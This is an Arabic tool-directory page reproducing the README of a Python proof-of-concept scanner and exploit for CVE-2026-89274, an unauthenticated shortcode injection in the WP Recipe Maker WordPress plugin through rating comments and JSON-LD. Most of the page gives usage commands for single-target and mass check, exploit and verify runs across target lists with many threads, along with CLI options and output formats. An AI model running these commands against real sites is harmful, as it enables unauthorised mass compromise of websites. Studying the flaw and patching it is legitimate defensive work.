Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2026-89274 — ماسح PoC بلغة Python واستغلال لـ CVE-2026-89274، وهي ثغرة تنفيذ اختصار عشوائي دون مصادقة في WP Recipe Maker <=10.8.1 عبر تعليقات تقييم الوصفات وJSON-LD. | Kitploit
أدوات/GitHubGitHub/murrez/cve-2026-89274
ماسحات الثغرات الأمنيةتحليل الثغرات الأمنيةالاستغلالالبرمجة النصية والأتمتةاستغلال تطبيقات الويبأمن الويباختبار الاختراق
GitHubmurrez/cve-2026-89274

CVE-2026-89274

ماسح PoC بلغة Python واستغلال لـ CVE-2026-89274، وهي ثغرة تنفيذ اختصار عشوائي دون مصادقة في WP Recipe Maker <=10.8.1 عبر تعليقات تقييم الوصفات وJSON-LD.

عرض المستودع
منذ يوم واحدلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

CVE-2026-89274 — تنفيذ Shortcode عشوائي في WP Recipe Maker

ماسح/مستغل PoC بلغة Python 3 لـ CVE-2026-89274 في WP Recipe Maker.

الإضافةwp-recipe-maker
المتأثرة≤ 10.8.1
تم الإصلاح في10.8.2+
CVSS9.1 (حرجة)
المصادقةبدون مصادقة (إرسال تعليق)
CWECWE-94

الملخص

تقوم WPRM_Metadata::sanitize_metadata() بتشغيل do_shortcode() على حقول البيانات الوصفية قبل strip_shortcodes(). تعليقات تقييم الوصفات المعتمدة (wprm-comment-rating) تملأ reviewBody في JSON-LD؛ الـ shortcodes المحقونة تُنفَّذ عند تحميل صفحة الوصفة ويمكن أن تسرّب المخرجات في البيانات المهيكلة.

المتطلب: يجب أن يكون التعليق الخبيث معتمداً (اعتماد تلقائي أو من مشرف). يمكن لوضع الاستغلال استخدام --verify لتأكيد ظهور العلامة في reviewBody ضمن JSON-LD.

المتطلبات

  • Python 3.9+
  • pip install -r requirements.txt

الاستخدام

root@kitploit:~
pip install -r requirements.txt

# Check plugin version + recipe page with comment rating form
python poc.py -u https://target.example --mode check

# Mass check
python poc.py --list targets.example.txt --mode check --threads 30 --quiet

# Mass exploit from check output (candidates.jsonl)
python poc.py --list candidates.jsonl --mode exploit --threads 20 \
  --shortcode "[caption]PROBE[/caption]" --verify --quiet

# Single-target exploit + JSON-LD verification
python poc.py -u https://target.example --mode exploit \
  --recipe-url /some-post-with-recipe/ \
  --shortcode "[caption]PROBE[/caption]" --verify

# Verify after comment approval (marker from exploit JSON)
python poc.py -u https://target.example --mode verify \
  --recipe-url /some-post-with-recipe/ --marker wprm89274_abc12345

# Batch verify prior submissions (submitted_mass.txt format)
python poc.py --list submitted_mass.txt --mode verify --threads 30 --quiet \
  --output verify_submitted.jsonl --vuln-list verified_leaks.txt

تنسيق سطر submitted_mass.txt (وضع verify)

root@kitploit:~
https://target.example|https://target.example/recipe-post/|post=123|marker=wprm89274_abc12345

خيارات CLI

الخيارالوصف
-u, --urlعنوان URL الأساسي لهدف واحد
--listقائمة عناوين URL، أو candidates.jsonl، أو submitted_mass.txt (verify)
--modecheck أو exploit أو verify
--recipe-urlعنوان URL للمنشور مع وصفة WPRM مضمّنة + تعليقات
--post-idcomment_post_ID في WordPress
--recipe-idمعرّف وصفة WPRM (اختياري --use-api)
--shortcodeالحمولة في نص التعليق (shortcode فحص افتراضي)
--markerVerify: البحث في JSON-LD عن سلسلة العلامة
--verifyExploit: تأكيد التسريب في JSON-LD بعد الإرسال
--use-apiأيضاً تجربة مسار REST لتقييم المستخدم في Premium
--threads, -jالتزامن الجماعي (افتراضي 20)
--outputنتائج JSONL (افتراضي cve_2026_89274_results.jsonl)
--vuln-listإخراج نصي للإصابات/التسريبات (افتراضي hits.txt)
--candidates-listبيانات وصفية لإصابات الفحص (افتراضي candidates.jsonl)
--quietإخراج تقدّم أقل في التشغيلات الجماعية

الإخراج (الفحص الجماعي)

الملفالمحتوى
cve_2026_89274_results.jsonlJSON لكل هدف
hits.txtعناوين URL الأساسية المرشّحة
candidates.jsonlpage_url، post_id، recipe_id، version

قيم status الشائعة (check)

الحالةالمعنى
candidateإصدار قابل للاستغلال + صفحة وصفة تحتوي على wprm-comment-rating
plugin_no_recipe_commentsالإضافة موجودة، لم يتم العثور على وصفة/صفحة تعليق مناسبة
recipe_no_comment_ratingصفحة وصفة بدون نموذج تعليق تقييم
patchedالإصدار ≥ 10.8.2
no_pluginلم يتم اكتشاف WP Recipe Maker

القيود

  • تأثير الـ shortcode يعتمد على الإضافات/القوالب الأخرى المثبّتة؛ استخدم فحوصات غير ضارة (مثل [caption]).
  • العديد من أهداف FOFA/القوائم مُرقّعة أو تفتقر إلى نماذج تقييم عامة.
  • عناوين URL للأرشيف (/blog/، /recipes/) قد لا تُظهر تسريبات JSON-LD؛ يفضّل الاستغلال روابط دائمة لوصفة واحدة عند اكتشاف الصفحات.
  • --verify يؤكد فقط انعكاس JSON-LD، وليس RCE كاملاً.

هيكل المستودع

root@kitploit:~
.
├── poc.py
├── requirements.txt
├── targets.example.txt
├── README.md
├── LICENSE
└── .gitignore

قوائم الفحص المحلية ومخرجات التشغيل (list.txt، *.jsonl، submitted_mass.txt، …) موجودة في .gitignore ولا ينبغي إيداعها.

قانوني

لـ اختبارات الأمان المصرّح بها فقط. أنت مسؤول عن الامتثال للقوانين المعمول بها وقواعد البرامج.

تنزيل الأداة